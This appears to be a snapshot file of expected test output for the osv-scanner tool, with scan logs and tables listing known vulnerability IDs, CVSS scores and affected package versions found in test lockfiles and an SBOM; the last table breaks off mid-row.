+-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | 
testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 4] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 1] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 2] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 3] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 4] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 1] --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 2] databases can only be downloaded when running in offline mode --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 3] --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 4] databases can only be downloaded when running in offline mode --- [TestCommand_LocalDatabases/ignoring_.gitignore - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/ignoring_.gitignore - 2] --- [TestCommand_LocalDatabases/ignoring_.gitignore - 3] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned 
/testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/ignoring_.gitignore - 4] --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 2] --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 3] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/nested_directories_are_checked_when_`--recursive`_is_passed - 4] --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: 
/testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 2] --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 3] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Loaded Packagist local db from /osv-scanner/Packagist/all.zip No issues found --- [TestCommand_LocalDatabases/one_specific_supported_lockfile - 4] --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 1] Scanning dir ./testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Filtered 1 local/unscannable package/s from the scan. Loaded Debian local db from /osv-scanner/Debian/all.zip Loaded Go local db from /osv-scanner/Go/all.zip Total 21 packages affected by 168 known vulnerabilities (18 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 2 ecosystems. 11 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 
1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 